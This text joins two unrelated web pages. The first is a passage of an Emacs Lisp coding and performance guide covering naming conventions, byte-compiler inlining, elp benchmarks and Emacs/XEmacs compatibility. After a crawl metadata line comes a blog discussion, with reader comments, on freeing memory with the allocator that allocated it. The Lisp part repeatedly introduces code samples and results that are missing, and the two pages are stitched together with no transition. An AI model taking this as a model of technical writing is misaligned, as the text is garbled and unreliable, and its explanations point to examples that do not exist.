To denote everything that they own: own variables own functions, maps.. Now it's very simple to post that code to someone else, and believe me everybody is happy when they receive good and clean code without someone else's initial involved. They feel that it's "my" code too, to solve "my" problems.
To extend this naming more, people should also use convention:
If it has anything to do with the csh-mode.el, so in general add the word my- + possible LIB-ID if you write some special functions for elisp packages. This way you can easily find all functions related to "csh-" package with describe-symbol function (available in tinyliby.el ), including your own.
There is still a matter of style with the variable naming. While it is possible to program like the "lisp" way, that may not be the best bet. In Emacs Lisp, variable and function names do not need to differ in any way, so it's perfectly legal to have same name for a variable and for a function and for a keymap and .. you name it.
This is both a good and a bad idea. The good part of it is, that when you're working with MODES or KEYMAPS, it's very desirable to have same name, so that you know what's going on in the code.
But in the other hand, if you're not using modes, the naming convention is .. hmpf, confusing. In practical terms it's lot more easier to look at the code if the symbol itself denotes the CLASS where it belongs. If everything looks the same, as lisp does due to its nature, it would be welcomed if there were something that separate variables from function elements.
In Tiny Tools you have seen another convention. Some has said that it "looks ugly", "I don't like it", and admittedly it can give that impression to the reader of the code.
But managing lisp code gets complicated and hard to maintain if you don't develop some aids. A different symbol naming according to their CLASSES does help to read my code better and help maintainer to see where the variables are and where the functions are. Here is one possibility:
There is another benefit from this: it is now possible to grep all symbols referring to variables, and there is no false hits, It is also posisble to run a program to do the name replacement and it succeeds 100%. Variables fromcan be searched from the buffer by give my-: prefix to search engine. All in all, navigating in lisp code is much more easier.
Have you ever tried to complete the lisp symbols? It's lot nicer when you car write my-: prefix and hit lisp-complete-symbol command to give you listing of all variables. No false hits concerning functions.
Why ":" ? Well, that is familiar to a C++ and Perl programmer and The ':' character seems neutral and visible enough to be used in the code.
There are also alternative choices, like using "--", double dash to denote variables:
Note: The colon character is by default in the same syntax class as the dash, so your lisp commands like backward-sexp work as usual. You can verify this with commands
Hrvoje Niksic hniksic@srce.hr, comp.emacs.xemacs, 13 Apr 1997
It is, but for a different reason. commandp returns t for interactive compiled functions, interactive lambda expressions, autoloads with fourth argument non-nil and *string and vectors*.
yields t not because [some vector] is a valid command, but because it can be callable through execute-kbd-macro or such. Documentation for commandp never guarantees that you'll be able to call-interactively the objects it blesses with t.
That is only a lousy-stated error message. You can call macros with execute-kbd-macro.
Steven L Baur steve@miranova.com
unwind-protect executes the clean up forms whenever the stack is unwound by either a throw (non-local exit), or by a signal (error condition). Condition-case handles only the error condition and can be bypassed by a non-local exit.
Here's some sample code that illustrates the differences: (tested on Emacs 19.34 and XEmacs 19.15)
If you call (wrapper-1 t), the "Caught Error..." message is never executed, but if you call (wrapper-2 t) it will be.
In the error signaling case, (wrapper-1 nil) will cause the error to be caught and never signalled up. Unwind-protect (wrapper-2 nil), the error condition does get propagated up. Since this appears to be what you want anyway, use unwind-protect.
I hope that makes it a little clearer.
The dolist command loops through a list and it is defined int the cl package; you can stop the loop with return command. Below you see example and the expansion with cl-prettyexpand.
macroexpand to find out the real expansion
Dave Gillespie daveg@thymus.synaptics.com comments:
Common Lisp loops use the Common Lisp block mechanism, not the catch mechanism. The Emacs CL package implements block in terms of catch, but there is a catch, so to speak.
The CL package treats block specially in order to optimize it. Catch blocks are expensive at run-time, so I wanted to make sure the compiler could eliminate them when the body code didn't actually call return. (This is especially important since many Common Lisp constructs include implicit blocks whether you use those blocks or not.)
There were technical reasons, which I don't remember exactly, why the optimization was best done in the compiler itself instead of in the block macro. Therefore, the CL package has some hacks to modify or delay the expansion of block under certain circumstances. But this will always be invisible unless you deliberately peek at the macro expansions. If you actually try using return or return-from in your code, you will find that it works properly.
The narrow-to-region lisp form is great if you create functions that should do their job in restricted area. Say:
There is also another way to write this function by not using the narrow at all. I would prefer this another alternative and avoid the narrow, because you can take advantage of the END parameter of re-search-forward.
[Jamie Zawinski jwz@netscape.com] ...A vector of length 0 can't be used as an obarray. And for performance reasons, an obarray should have a length which is prime, and which is roughly the size of the number of elements you're going to put into it; The larger the ratio of elements/length, the more time lookups will take.
[24 Jan 1996, terra@diku.dk (Morten Welinder)] If you're not an Emacs wizzard you should skip these patches for now. You may benefit later. I have discovered that lots of Emacs Lisp code uses equal and = where they could have used eq or even null.
Examples. Often you see something like these expressions:
which from a functional (and style) point of view are perfectly ok. But they're not as efficient as they could be. The ones below are better because they use the available type information about the arguments.
Simon Marshall Simon.Marshall@esrin.esa.it Jan 1997 in gnu.emacs.help mentined that
...One difference not mentioned is that they are byte-compiled differently. I think
results in faster byte-code than
[Hrvoje Niksic hniksic@srce.hr 1998-03-13 XE-L]
...`let' sets up an unwind-protect that remembers the old value (2), and places the new value to the symbol value slot (nil in this case). When you assign 4 to global, it's written to its value slot, overriding nil. When let is left, the internal unwind-protect restores the old value (2).
This is one of the reasons why let is extremely slow in Emacs Lisp.
This all is actually explained well in the Emacs lisp pages, but let's refresh memory a bit. Let's start with the traditional example:
The lisp manual page in says that "(elisp, Node: Anonymous Functions) ...Lisp compiler cannot assume this list is a function, even though it looks like one". So, we have to help byte compiler by adding function directive.
Which, when compiled probably speeds the code by factor 2 or more. One compatibility not to this: in Emacs 19.29 and up you can actually write like this, which is exactly the same as the using the function syntax.
[Jerry Quinn jquinn@nortel.ca] ...I used to dump data to buffer and then moving to a column, making various changes with insert and delete-char and moving on to the next change. It would take about 22 seconds on my system
I now collect the message data into lists with regexps erase the buffer and dump the new results in with format. This is MUCH faster. (3sec compared to previous 22sec)
18 Sep 1996, Andreas Schwab schwab@issan.informatik.uni-dortmund.de answered to question below
> (defalias 'pair (symbol-function 'cons))
> (defalias 'pairp (symbol-function 'consp))
>
> The trouble is that the byte-compiler doesn't optimize a
> call to e.g. pair as it would do with a call to cons
> because it doesn't recognize pair as an alias for cons.
>
> Is there a way to tell the byte-compiler to treat
> pair the same way as cons?
19 Feb 1996, andersl@csd.uu.se (Anders Lindgren)
> If you have code that depends on a library that is not
> always included in a program (be it Emacs Lisp or other
> Lisp), the correct way to insure that it's compiled
> properly is to do the require. It's not overkill; after
> all, a user presumably will only compile it once. And >
> it may save you from interactions that you cannot predict
> now, e.g., when at some future time when you change your
> package or font-lock changes in a future revision of
> Emacs.
Genrally this is a good idea. Unfortualtely, when it comes to font-lock it's not. It contains a check that it is runed under a window system, and barfs at load-time if it's not. This makes it impossibel to require the package when compiling in batch mode or on a system without a window system.
I have been using a (very ugly) method where I replace statements by equivalent statements which doesn't raise the anger of the compiler:
This type of coding is specially useful when writing programs which should be able to run (and compile) under both under Emacs and XEmacs. – Anders
The byte compiler is quite powerfull, but there is only handfull of people who really understand how its features can be exploited in full. Here is couple of suggestions how you could force some function to be inlined and thus save the function call, which in emacs is quite expensive (see the profiling results later and examine eg. mapcar)
Notice that
But in case of func beeing a regular 'defun' you want to use special form inline to force inlining the code.
See what we got:
As you saw; the func was open coded inside function my. Here is reminder from the byte compiler page:
You can also open-code one particular call to a function without open-coding all calls. Use the 'inline' form to do this, like so:
You can make a given function be inline even if it has already been defined with defun by using the proclaim-inline form like so:
This is, in fact, exactly what defsubst does. To make a function no longer be inline, you must use proclaim-notinline. Beware that if you define a function with defsubst and later redefine it with defun, it will still be open-coded until you use proclaim-notinline.
[Moral: do not make interactive functions defsubst] [Sample test file available: test-defsubst.el]
When I was converting some very small functions from defun to defsubst, I run in to this observation. I was wondering what inlining would do to functions that had interactive spec. Below the terms IACT refers to functon that has interactive spec; Here is th epseudo code for two functions.
Now, there is conflict, because when I byte compile fun2, we see
Where the iact-fun1-body is copied "as is". And that was what I was afraid of. Because iact-fun1-body had (interactive-p) test, it gets inserted into wrong place and the whole construction isn't what I intended. Here are the results in case you're interested.
byte code for test2 reveals how the inlining happened.
Here is collection of tests and results I made out of curiosity which way is better to code.
Note, that if you time the same functions you will get different absolute timings. Nevertheless, you should get same results about the fact that which one feels fastest. The values have been taken from the Elapsed row: IT DOES NOT REPRESENT EXACT TIME SPENT in the function, because time spent depends on of operating system and current load of the Unix machine.
Strong Note: [From elp.el, Barry Warsaw] Note that there are plenty of factors that could make the times reported unreliable, including the accuracy and granularity of your system clock, and the overhead spent in lisp calculating and recording the intervals. I figure the latter is pretty constant, so while the times may not be entirely accurate, I think they'll give you a good feel for the relative amount of work spent in the various lisp routines you are profiling. Note further that times are calculated using wall-clock time, so other system load will affect accuracy too.
Keep in mind that some of the tests may be very stupid or misleading to experienced lisp programmer or to person who knows Emacs internals very well. My sincere intention has been pure curiosity. Please feel free to send any comments or corrections for the used tests cases if they are not representative enough. It is unfortunate if some test case presented here is totally bogus and someone reads it with good intention.
The elp.el is great, but don't trust the first results. Sometimes the timings are totally different if you clear the list and run the tests again. Repeat your test cases at least 3 times before you derive conclusions about the performance.
In here, the harness count is mentioned; that means that the test has been repeated N times and that the most representative time values has been selected(usually average). Using elp, say 10 times to repeat the test and record the timing, should give you solid estimate what timings are right.
You can use the elp very easily via minor mode if you ftp lisp helper module: tinylisp.el. All the tests have been executed with that package in the following manner:
After the tili-elp-harness function (where you can give the prefix how many times to repeat the test set; defualt is 3) has finished the elp results are shown in separate buffer from where the average of the results can determined.
If you byte compile files, the generated code is much faster thnt what the non-byte compiled one. During byte compiling, some structures are also optimized so that while they may look different in the code, the byte code is exactly the same. This means that if you should pay attention to tests that show considerable timing differencies that probably are not optimized away.
Here are som examples where you see the effect of byte compiling Pay attention to cases 1a and 1d which show you fine example how byte compilation optimizes structs.
[_1a_] Using let in function.
Here is one long way to read byte code. If you want to byte compile expressions withing functions, you probably want to be aware of this method too.
Here shorter way to read byte code; which produces exactly the same byte code as previous one. The disassemble compiles the sexp automatically.
[_1b_] Same as previous one, but using the call let*. Notice, that the only difference to previous one is the order how the variables are pushed into stack. In 1a case all the values were pushed there first and then popped in varbind. Internal stack depth is thus bigger in 1a and according to experts, that makes big let statements slightly slower than if one used let* for the same purpose.
[_1c_] Example, where let* binds previous variables. This has same byte code as 1b.
[_1d_] In the following we use multiple let stetments and the byte compiling reports that the byte code is equal to 1a. A fine example how byte compiler optimizes statements.
[_4_] Things change if there is some call between the let stetments
Let me start by and example. I was not sure what the impact of callf would be if I used it my code, so I pulled out byte compiler and dissassempled some of test defun.
The call (callf or var 0) expand to statement (let* nil (setq var (or var 0))), so I wrote three function and compared their dissassemble results: They were identical. Generated empty let statement was optimised away. This is a good sign that you can safely use cl macros.
The format of the test function was presented by [Vladimir] and from the timing you can see how much the this wrapper affects the timings measured. Because the timing is measured from the Elapsed(accumulted time) row, here are the reference times for different loop-for values: 5 and 10 that are normally used in test.
As you can see; there is no difference between the element retrieval functions.
The results were quite impressive. Naturally using the reverse command is slower, because it has to access each elemnt, where addressing last element directly is the fastest possible way.
There seems to be huge diffrence between while and mapcar. probably due to function call the mapcar does every time when passing element to lambda function.
If I want to append things to a list, should I do it with append or with nconc or cons? So that results are comparable to each other, every function must return the list in the same order and that's why you see nreverse calls prior returning the list in some functions.
Wow. using append to add to the end of list is enermously slower than when compared to fastest way cons. You should only use append to add to the beginning of list.
[Vladimir]
This is expected. For every call, append traverses to the end of the list, making a copy along the way, then adds a new element at the end, then discards the old list. This may even lead to garbage collection, which can take unpredictably long.
nconc is better in that it doesn't copy the list ("doesn't cons", which means that doesn't create new conses. Cons creation is quick when the new cons is taken from the free cons list, but if that is exhausted, memory allocation should be done). However, nconc still traverses the list at every iteration.
cons just adds a new cell at the beginning. append and nconc take O(n^2/2): when the list length is l they perform O(l) operations to traverse the list. cons has amortized cost O(1) (ie constant). "Amortized" means that it may cause memory allocation and/or garbage collection every once in a while, but most of the time it won't.
Idea by Morten Welinder terra@diku.dk (copy-sequence minor-mode-alist) only copies the cdr structure of the list (mapcar 'copy-sequence minor-mode-alist) ought to copy the pairs in the alist `copy-alist copies' list structure and pairs: it does slightly more than we need but it is much faster.
See explanation in (benchmarks) which explains the unexpected result where let* is marginally faster.
[Vladimir]
From common sense, it wouldn't matter how you arrange your lets and how you init the vars, even if your function is called in a long loop. The function call time will still dominate the lets. If fc=100 and let=1, a second let will only add 1% to the overall time. The only time it matters is when the inner let is inside a loop, in which case it will probably pay to take it outside.
We'll find that using let inside loop (defining variable j again and again) slightly decreases the performance. Yes, only slightly, because you don't normally use 1000 let statements in your function. This would also suggest that even if you put several let statements into the function, that wouldn't be be very much slower that using just one let statement at the beginning of file.
It seems that there is not much difference in tested emacs. I wouldn't be that thrilled of the results, but I'd guess that let* would have been definitely slower that let. Let try with variation where let* is used for the purpose is it meant to: binding previous values's content.
Hm. While the let* binds previous variables values to successive ones, there still doesn't seem to be a big difference. Don't pay attention to marginal 0.1 advantage which let* seems to have gained.
Some times I only need one variable and I have a bad habbit of defining it in the function call argument list to save typing and indentation of let call. Like following.
Above I only needed one variable, that I named ignore, and used it to record the return status of function. But does this buy anything for me? lets find out.
If doesn't seem to matter much. I have just had a bad habbit and I should get rid of it.
The count of variables starts gradually affecting the performance. Decide yourself how big threath using many variables is to your function: usually there are other statements that affect the overall perfomance of the function much more. The function call alone takes considerable amount of time when compared to sole let statement.
I always question myself, does it make difference shere I set the variables value. Some times If I complex initializations I would like to declare variable (not set it) in let stament and leave the initializing after the let. This seems to indicate that using the let to set the variables is better.
Yes they do. Using one setq command is naturally faster than many of them. For comparision there is t0 function which does the same, but does not use setq at all.
Neither. Common sense tells you that too: this is actually a stupid test, but I was curious what elp says. From here you can see that elp.el isn't that bad if you use it for timing.
I have very hard time to determine which elp results would describe the average timing difference. I ran the elp test several times, but the deviation between the results were too big to give any reliable estimate. Be very skeptical.
I just wonder if it makes sense to test hook contents before running it. Why should I call function run-hooks if there is nothing in a hook? From the results point of view, the there is small time difference: we prevent a function call to run-hooks.
Supposes you have some data in some variable, but you wonder does ot make a difference to return that data to calling program or just plain boolean t or nil
Consider that we have some string data that we could return to mean True value, or success. The t2 changes the final return value to boolean.
No, it doesn't seem to make any difference, so we just return anything we have already in the variable.
[Vladimir] ...There is nothing that could slow down the t1 function, because returning the variable does not make copy of it, it only delays garbage collection of that structure for a while.
If you use the length of list in many places, calculating it every time with length function decreases performance considerably.
During development of my packages I run into many incompatibities not only between Emacs and XEmacs, but also between Emacs version. If you care to write XEmacs and Emacs compatible code without hashless, I'd recommend using fucntions from my main library: they offer transparent interface to certain Emacs and XEmacs specific features. See these libraries and funcktions
Good news! XEmacs 19.15 now has package overlay.el which mimics the calls of Emacs overlay functions. This means, that you no longer need to try to accomodate both Emacs(overlay) and XEmacs(extent) commands into your code. Following is enough to make your overlay code work in XEmacs.
Don't use Emacs specific menus, but see easymenu.el and compose your menus with it. Below you see a very simple minor mode and it's menu definition. The menu appears when the minor mode is turned on and disappears when the minor mode is turned off (at least in Emacs). Pay attention to the Selection 3 that can be enabled and disabled on the fly.
Note: The easymenu's enable/disable choice is buggy in Emacs 19.28 - 19.34 (in non-windowed mode), so if the progn tests at the end of file fail, don't mind that. Newer Emacs releases have fixed the problems.
Here is a small list of functions that do not work in both emacs versions.
Hrvoje Niksic hniksic@srce.hr 17 May 1997 comp.emacs.xemacs
Use CL package's hash function which are compatible with Common Lisp and GNU Emacs. They use XEmacs hashtables on XEmacs and emulate CL hashtables on GNU Emacs.
Now, if you want to dump the hash-table anywhere, the simplest thing to do is dump it to a list. For example, your program crunches data in and out of hashtable for
There you have all your entries in alist, which you can print, save to file etc. All of this is, of course, much faster than if you had used an alist all the time, since the search time would have been O(n) instead of much better hashtable characteristics.
If you had any character tests in your code, it will likely break in XEmacs20 and Emacs20, where a single integer does no longer present a charcter code. Beware especially contructs where you read characters directly and test the input:
That will no longer work as expected. Also if you have test like this
Those will fail also because you can't use old operators like eq. In my latest 'm' library there is emulation for some of the following functions that are from XEmacs20's documentation. The above example can now be converted into
And the code will work in every Emacs 19.28+, XEmacs 19.14+.
17.6.1 Characterp: (object), XEmacs20
t if OBJECT is a character. Unlike in FSF Emacs, a character is its own primitive type. Any character can be converted into an equivalent integer using char-to-int. To convert the other way, use int-to-char; however, only some integers can be converted into characters. Such an integer is called a char-to-int; see char-int-p.
Some functions that work on integers (e.g. the comparison functions <, <=, =, /=, etc. and the arithmetic functions +, -, *, etc.) accept characters and implicitly convert them into integers. In general, functions that work on characters also accept char-ints and implicitly convert them into characters. WARNING: Neither of these behaviors is very desirable, and they are maintained for backward compatibility with old E-Lisp programs that confounded characters and integers willy-nilly. These behaviors may change in the future; therefore, do not rely on them. Instead, use the character-specific functions such as char=.
17.6.2 Char.3 Char-to.4 Int-to-char: (integer) XEmacs20
– a built-in function. Convert an integer into the equivalent character. Not all integers correspond to valid characters; use char-int-p to determine whether this is the case. If the integer cannot be converted, nil is returned.
17.6.5 Char-int-p: (object) XEmacs20
– a built-in function. t if OBJECT is an integer that can be converted into a character. See char-to-int.
17.6.6 Char-equal function (c1 c2 &optional buffer) XEmacs20.0
– a built-in function. Return t if two characters match, optionally ignoring case. Both arguments must be characters (i.e. NOT integers). Case is ignored if case-fold-search is non-nil in BUFFER. If BUFFER is nil, the current buffer is assumed.
17.6.7 Char= (c1 c2 &optional buffer) XEmacs20.1
– a built-in function. Return t if two characters match, case is significant. Both arguments must be characters (i.e. NOT integers). The optional buffer argument is for symmetry and is ignored.
This file has been automatically generated from plain text file
with
t2html
Last updated: 2008-08-09 18:07 | http://www.nongnu.org/emacs-tiny-tools/elisp-coding/index-body.html | CC-MAIN-2016-40 | refinedweb | 11,253 | 71.34 |
This page provides Python code examples for sklearn.model_selection.train_test_split.. Here is an example of Setting up a train-test split in scikit-learn: Alright, you've been patient and awesome. The following are code examples for showing how to use sklearn.cross_validation.train_test_split. They are from open source Python projects. You can vote up the examples you like or vote down the ones you don't like. 07/02/2019 · >>> from sklearn.model_selection import train_test_split >>> from sklearn.datasets import load_iris; Do you Know about Python Data File Formats — How to Read CSV, JSON, XLS. How to Split Train and Test Set in Python Machine Learning? Following are the process of Train and Test set in Python ML. So, let’s take a dataset first.
>>> import pandas as pd >>> from sklearn.model_selection import train_test_split >>> from sklearn.datasets import load_iris. Do you Know about Python Data File Formats – How to Read CSV, JSON, XLS 3. How to Split Train and Test Set in Python Machine Learning? Following are the process of Train and Test set in Python ML. Similarly, we’ll split the dataset y into two sets as well — yTrain and yTest. Doing this using the sklearn library is very simple. Let’s look at the code: from sklearn.model_selection import train_test_split xTrain, xTest, yTrain, yTest = train_test_splitx, y, test_size = 0.2, random_state = 0. Train/Test/Validation Set Splitting in Sklearn. Ask Question Asked 3. X_val, y_train, y_test, y_val with Sklearn? As far as I know, sklearn.cross_validation.train_test_split is only capable of splitting into two, not in three. machine-learning scikit-learn. How to avoid covariate shift in python and distribute classes in each train and. sklearn.model_selection.ShuffleSplit¶ class sklearn.model_selection.ShuffleSplit n_splits=10, test_size=None, train_size=None, random_state=None [source] ¶ Random permutation cross-validator. Yields indices to split data into training and test sets. News. On-going development: What's new; January 2020. scikit-learn 0.22.1 is available for download. December 2019. scikit-learn 0.22 is available for download. Scikit-learn from 0.21 requires Python.
scikit-learnのtrain_test_split関数を使うと、NumPy配列ndarryやリストなどを二分割できる。機械学習においてデータを訓練用(学習用)とテスト用に分割してホールドアウト検証を行う際に用いる。. 13/01/2020 ·.
I want to implement a machine learning algorithm in scikit learn, but I don't understand what this parameter random_state does? Why should I use it? I also could not understand what is a Pseudo-r. In the previous paragraph, I mentioned the caveats in the train/test split method. In order to avoid this, we can perform something called cross validation. It’s very similar to train/test split, but it’s applied to more subsets. Meaning, we split our data into k subsets, and train on k-1 one of those subset. 12/01/2020 · Ordinary least squares Linear Regression. LinearRegression fits a linear model with coefficients w = w1, , wp to minimize the residual sum of squares between the observed targets in the dataset, and the targets predicted by the linear approximation. Whether to calculate the intercept for this.
Pre-requisite: Getting started with machine learning scikit-learn is an open source Python library that implements a range of machine learning, pre-processing, cross-validation and visualization algorithms using a unified interface. train_test_split()是sklearn.cross_validation模块中用来随机划分训练集和测试集,以Iris数据集为例。有以下四个特征 - sepal length in cm.
それを避けるために、 train_test_split 関数を使ってデータを分割しています。 train_test_split 関数はデータをランダムに、好きの割合で分割できる便利な関数です。 X_train: トレーニング用の特徴行列(「アルコール度数」「密度」「クエン酸」などのデータ). A Computer Science portal for geeks. It contains well written, well thought and well explained computer science and programming articles, quizzes and practice/competitive programming/company interview. List containing train-test split of inputs. New in version 0.16: If the input is sparse, the output will be a scipy.sparse.csr_matrix. Else, output type is the same as the input type. 10/08/2018 · ''' Python for Machine Learning - Session85 Topic to be covered - Stratify Parameter in train_test_split Stratify parameter ensures that the proportion of values in the train, test split samples produced will be same as the proportion in the input dataset. ''' import pandas as pd from sklearn import cross_validation, datasets df.
from sklearn.cross_validation import train_test_split,train_test_split下出现红色波浪线 11-02 阅读数 4999 大家可能会遇到这样的问题,明明fromsklearn.cross_validationimporttrain_test_split在一台电脑上运行没有任何问题,但是换了一台电脑就出现如下图所示的问题,. 8.3.9. sklearn.cross_validation.train_test_split. Python lists or tuples occurring in arrays are converted to 1D numpy arrays. test_fraction: float default 0.25 Should be between 0.0 and 1.0 and represent the proportion of the dataset to include in the test split. Here is an example of Train/Test SplitFit/Predict/Accuracy: Now that you have learned about the importance of splitting your data into training and test sets, it's time to practice doing this on the digits dataset! After creating arrays for the features and target variable, you will split them into training and test sets, fit a k-NN.
09/08/2018 · 0:01 - Theory behind why we need to split given dataset into training and test using sklearn train set split method. 0:54 - Coding Here we use car price prediction problem to demonstrate train test split 2:14 - Use train_test_split from sklearn 3:54 - Use of random state method 4:49 - Use of fit method to train your model. In this tutorial, we will learn an interesting thing that is how to plot the roc curve using the most useful library Scikit-learn in Python. This tutorial is a machine learning-based approach where we use the sklearn module to visualize ROC curve..
15/06/2018 · Generally, we split our dataset according to 80/20 rule i.e 80% of dataset goes to training set and 20% goes to test set. We are going to use test_train_split method of sklearn library to perform this task in python. Consider our dataset is of following form. I am a beginner in machine learning, and I hope someone can help me. In Python's 'scikit-learn' library, the function 'train_test_split' splits the dataset into training and test sets. This is don.
Tecnologia Musicale Hnd X
Testo Lampeggiante In Turbo C
Cavo Usb Per Xbox Normale
S Nota Vinci 10
Strix 7.1 Vs Razer Tiamat 7.1
Mindmanager 16 Crack
Ender 3 Firmware Raspberry Pi
Foglio Di Pianificazione Delle Voci Del Diario Ks2
Blocco Teletrasporto Plugin Minecraft
Formato Proposta Di Ricerca Di 2 Pagine
Tubemate Scarica Il Sito Ufficiale
Simboli Per Il Marchio
Installa Xampp Con Mysql
2 Indesign Dati Variabili
La Traduzione Del Menu Di Wpml Non Funziona
In Incognito Sull'atmosfera
Migliori Font Gratuiti Per Poster
Apple Watch Serie 1 Opiniones
Linguaggi Di Programmazione Più Pagati Uk
Linguaggio Pubblico Privato
Fft Matlab Dà
Casa Residenziale Sketchup
Autocad Vba Pdf
Download Gratuito Di Wavepad Per Windows 7 A 64 Bit
Alfa Phi Logo Vettoriale
7zip Catrame
Apache Ssl Setup Windows
Foglio Di Copertina Fax Vuoto Stampabile Pdf
Salva Gif Da Photoshop
Lettere Dwg
/ | http://casacaymanrealestate.com/train_test_split-in-sklearn-python | CC-MAIN-2020-45 | refinedweb | 1,111 | 58.69 |
I'm sure it's been drilled into your head by now that you have to free memory with the same allocator that allocated it.
LocalAlloc matches
LocalFree,
GlobalAlloc matches
GlobalFree,
new[] matches
delete[]. But this rule goes deeper..
Note, however, that if you decide that a block of memory should be freed with the C runtime, such as with
free, or with the C++ runtime via
delete or
delete[], you have a new problem: Which runtime?.
This is the main problem when building plugins for 3dstudio max – you must use the same version of visual studio or rely on almost-working wrappers to alloc/free memory.
I suppose I should point out how ac’s example of using FILE from the C standard library has the same problem as using malloc/free. If I write a program with MSVC and link to a module compiled with Borland C, there’s no guarantee that the linked module’s idea of a FILE will be the same as mine.
The solution to this is to export fprintf() and fclose() functions, or simply pass around OS file handles.
Btw, the strongest reason for using the wrapper technique is that the wrapper technique allows for finer grained control over the memory allocations. For instance you might decide that due to heap fragmentation issues, you need to drop in a fixed size allocator at some point in the future.
Or you might decide you need to use a private heap (like the low fragmentation heap). If you use a wrapper, you can change these behaviors without breaking clients.
To Gabe:
Well I thought we were talking about how to develop a set of our own functions, which are to be used in our applications or applications of somebody else, and make sure that they are "consistent" to the rest of the world. I gave "fopen, fclose" just as the example of the method.
So if you make such functions, in "fopen, fclose" style, you have to export them if others are supposed to use them. Of course, if you let everybody in your project to compile his own instance of the body of your functions , you’ll have more things to worry.
But as you said, once they are exported, then our fclose equivalent is always the one that matches our fopen.
I think this whole series is leading up to a rule that I put in place for my own projects long ago.
<b>Memory should be deallocated as closely in scope as possible to the place that it was allocated.</b> This means the same function where you can get away with it. If not, then same class, or at the very broadest, same module.
This neatly avoids all of the issues that Raymond has brought up about selection of compiler, API, and instance, and as well guarantees that when the allocator suffers a maintenance change, the deallocator can easily be changed simultaneously.
Another execption to the rule about using CoTaskMemFree across COM boundaries is that pointers embedded inside [in,out] parameters must be allocated using MIDL_user_allocate/MIDL_user_free in the server. See for details.
This is one of the reasons why the Boost shared_ptr always carries its own deallocator around. No matter which module allocated the shared_ptr, no matter which module destructs the last shared_ptr, you’re guaranteed that the correct deallocation function is called, even across module boundaries.
Of course this comes with an overhead, but I believe it is worth it.
Mm…
Or you can use Java.
> Switching to a new compiler risks exposing a subtle bug, say, forgetting to declare a variable as volatile or inadvertently relying on temporaries having a particular lifetime.
That is true. However, there is another pitfall: switching to another compiler also (at times) introduces bugs that didn’t exist in the source, due to bugs in the compiler. Some versions of Red Hat-patched gcc come to mind (broken inline assembly in obscure cases), as do some recent versions of VC++ (broken loop optimization for abnormal but legal loops is what I *think* it was).
This whole concept is another of those things that make it hard to port some Unix/Linux libraries to Windows. For instance, libpcap has a couple functions that allocate and return memory. The libpcap docs basically say "free() this memory". When libpcap was ported to Windows (WinPcap), they used the C library malloc(), so that callers could continue to use free(). But since there’s only one C library on Linux, and there are many on Windows, they ran into problems when people tried to free the memory (these people were linking to different C libraries than the WinPcap DLL linked to).
I don’t know whether they’ve fixed that or not, or how they fixed it if they have. It would be nice to have Only One C Library on Windows, but I don’t know how possible that even is. (Given how much software is distributed as binaries, probably not very…)
For me, the C standard library f* functions are a classic example of how complex things can be kept simple. Sadly, a lot of programmers didn’t learn from this, so often there were popularized so many supposedly "cooler" things.
So, you have to work with a pointer to something (here, file, since in the original Unix everything was supposed to be a file):
FILE* f;
You get a pointer to the file by opening it:
f = fopen( "somefilename", "a+" );
You don’t care who allocated it, or if the library even took a preallocated object. You just have it, and can use it.
First, error handling: was the "construction" successful? Instead of horrible but "oh so modern" trying and catching, you just check for success:
if ( !f ) {
return;
}
Then you can use it…
fprintf( f, "%.2fn", 2 * r * pi );
And finally "release it":
fclose( f );
What is used to delete f? Maybe the same memory behind f can be reused for the next opened file. You don’t care, fclose knows what to do.
"Those who do not learn from the past are doomed to use much worse than the past solutions". In 2006 we have to learn people to avoid the hype and look to something made in 1973, to prevent them shooting themself (and many affected by their programming) too much in the feet.
BryanK: One CRT to rule them all? Microsoft tried it. From Visual C++ 4.2 through to 6.0, the same DLL name was used: MSVCRT.DLL. The result? DLL hell. Some applications couldn’t cope with changes in the new DLL, and some older installers erroneously installed an old version over a new version, breaking new applications.
Windows 2000 put MSVCRT.DLL under Windows File Protection (although I think this is mostly because WordPad and Microsoft Management Console were written with MFC and hence used MSVCRT.DLL) and this is still true in Windows XP and Server 2003. Windows Vista still ships MSVCRT.DLL (with a shiny new version number) and now it cannot be written to by any process except for an OS update.
Before someone brings up the versioning inherent in *nix dynamic library linking, let me point out that simply changing the name of the DLL has pretty much the same effect in Windows – which is of course what Microsoft have done. This still doesn’t solve DLL Hell problems between different minor versions of the same major-version DLL, on either OS. That’s what Win32 Side-By-Side (SXS) assemblies are for. All subsequent versions of the CRT (7.0, 7.1, 8.0) so far have included a manifest and been installed to the side-by-side folders for explicit binding on OSs which support it (XP, 2003 and later).
I don’t think it’s possible for two side-by-side versions of the same DLL to be loaded into the same process – I believe the choice is governed by the EXE’s manifest. If it is possible that would even cause problems with assuming that you can use ‘delete’ from a module with the same name as the one you called ‘new’ from! Windows will allow you to load DLLs with the same name from different paths, of course.
“…all memory returned across COM interface boundaries must be allocated and freed with the COM task allocator.”
Does this mean that SysAllocString() uses that allocator? I can’t find any specifics in MSDN.
Obviously, we should put this out of our minds when actually *using* BSTRs.
Why is it that these external allocators are more stable than malloc? Are the maintainers of those routines more meticulous than the vcrt maintainers? Also, what exactly does “external” mean here? Perhaps the answer to that question answers the rest.
Brian, think of it this way.
You have a EXE statically linked to CRTL and a DLL statically linked to CRTL. This means that the EXE and DLL not only don’t share the same malloc and free code, but they don’t share the same data structures used to support these routines.
Let us assume that malloc and free are just wrappers around HeapAlloc where CRTL uses a private heap. In that case, if you allocated memory in the DLL, one heap would be used. If you tried to free that memory in the EXE, then it would try to free that memory to a DIFFERENT heap. Thus bad things start to happen.
External basically means an allocator that isn’t part of the programmer’s EXE or DLL. For example, CoTaskMemAlloc is a external allocator that just lives in another DLL that will be shared between the EXE and all the DLLs. So you avoid the whole multiple malloc/free issue.
And then what happens when your Java code has to use JINI to call a native function, because Sun didn’t give you whatever you need to get at in the JRE? How do you free memory that that function may have allocated?
(In other words: This is a problem in *any* language that allows the programmer to call into native OS DLLs. Even languages with full GC.). That is, there’s never any danger of the user calling the *wrong* deallocation function; the only possible danger is that the user won’t call any at all (which is easily avoided via dispose/finalize).
Uhh… A pretty dumb question: if all of those allocators run inside the same process, how do they manage not to hurt each other, so to speak? Who keeps track of what parts of the VM space are in use? How do they manage not to collide, and leave enough space for the others (if they need continuous space)? How do they request/release memory from the OS?
At the end, all allocators get their memory from the OS via VirtualAlloc, and then divide up these larger pages to satisfy requests from the caller. No magic involved.
